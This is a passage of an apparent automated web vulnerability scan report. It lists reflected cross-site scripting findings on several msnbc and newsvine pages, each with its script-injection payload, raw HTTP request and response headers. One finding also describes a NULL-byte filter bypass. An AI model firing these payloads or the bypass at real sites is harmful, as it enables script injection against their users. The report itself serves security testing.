GET /google?71cf2"><script>alert(1)</script>12874fc86d7=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:45:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132421
5.240. http://technolog.msnbc.redacted/internet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/internet
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeb87"><script>alert(1)</script>a704b07fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet?aeb87"><script>alert(1)</script>a704b07fdd2=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:49:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 149188
5.241. http://technolog.msnbc.redacted/ipad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/ipad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4d5"><script>alert(1)</script>6ef19b0523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipad?cc4d5"><script>alert(1)</script>6ef19b0523=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:43:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132805
5.242. http://technolog.msnbc.redacted/iphone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/iphone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d48e"><script>alert(1)</script>7c0d864a257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphone?6d48e"><script>alert(1)</script>7c0d864a257=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:45:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 129223
5.243. http://technolog.msnbc.redacted/itunes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/itunes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658d8"><script>alert(1)</script>b143555169b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /itunes?658d8"><script>alert(1)</script>b143555169b=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:59:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 136791
5.244. http://technolog.msnbc.redacted/microsoft [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/microsoft
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce941"><script>alert(1)</script>7e4339e6fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /microsoft?ce941"><script>alert(1)</script>7e4339e6fe9=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 18:53:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 149069
5.245. http://technolog.msnbc.redacted/motion-controls [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/motion-controls
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78079"><script>alert(1)</script>78bad224f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /motion-controls?78079"><script>alert(1)</script>78bad224f9c=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 03:05:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 176922
5.246. http://technolog.msnbc.redacted/online-privacy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/online-privacy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf78"><script>alert(1)</script>dfde2d718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online-privacy?edf78"><script>alert(1)</script>dfde2d718a=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:01:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139441
5.247. http://technolog.msnbc.redacted/science [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/science
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a821"><script>alert(1)</script>b786dcb3635 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /science?1a821"><script>alert(1)</script>b786dcb3635=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 18:50:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 147590
5.248. http://technolog.msnbc.redacted/social-media [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/social-media
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12220"><script>alert(1)</script>e33ff4d9b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /social-media?12220"><script>alert(1)</script>e33ff4d9b49=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:58:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139987
5.249. http://technolog.msnbc.redacted/twitter [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/twitter
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d574"><script>alert(1)</script>c024c76222e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /twitter?9d574"><script>alert(1)</script>c024c76222e=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:51:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 140678
5.250. http://technolog.msnbc.redacted/verizon-wireless [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/verizon-wireless
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319d5"><script>alert(1)</script>049683b898c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /verizon-wireless?319d5"><script>alert(1)</script>049683b898c=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 18:55:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 119849
5.251. http://technolog.msnbc.redacted/viral [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/viral
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c125e"><script>alert(1)</script>c8d83ce76c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /viral?c125e"><script>alert(1)</script>c8d83ce76c4=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:57:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154054
5.252. http://technolog.msnbc.redacted/windows-phone-7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/windows-phone-7
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9291"><script>alert(1)</script>7cb6a5b6f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /windows-phone-7?b9291"><script>alert(1)</script>7cb6a5b6f1c=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 03:03:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 163051
5.253. http://technolog2.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog2.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfc1"-alert(1)-"8900880333e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8cfc1"-alert(1)-"8900880333e=1 HTTP/1.1 Host: technolog2.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:54:40 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3d19d956049533bc77cf73673a3c5868; expires=Sat, 25-Jan-2031 02:54:40 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 83474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
5.254. http://thelastword.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://thelastword.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406b"><script>alert(1)</script>2b8d8f3d529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1406b"><script>alert(1)</script>2b8d8f3d529=1 HTTP/1.1 Host: thelastword.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:55:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67411
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 73d76<img%20src%3da%20onerror%3dalert(1)>9f3c8012458 was submitted in the path parameter. This input was echoed as 73d76<img src=a onerror=alert(1)>9f3c8012458 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 15:04:31 GMT Connection: close Content-Length: 505
{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin ...[SNIP]... :{"lgstate":-1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"24773034","domainName":"thelastword","displayName":"The Last Word","avatar":null,"path":"\/73d76<img src=a onerror=alert(1)>9f3c8012458"},"revision":"23247"}
5.256. http://toddkenreck.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://toddkenreck.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a9c"-alert(1)-"6afa59ca3a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?20a9c"-alert(1)-"6afa59ca3a6=1 HTTP/1.1 Host: toddkenreck.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:58:30 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=b7ceac04b38fe3c57cfc6121518e2eed; expires=Sat, 25-Jan-2031 02:58:30 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 66391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c2db</script><script>alert(1)</script>d7be7cfafdb was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
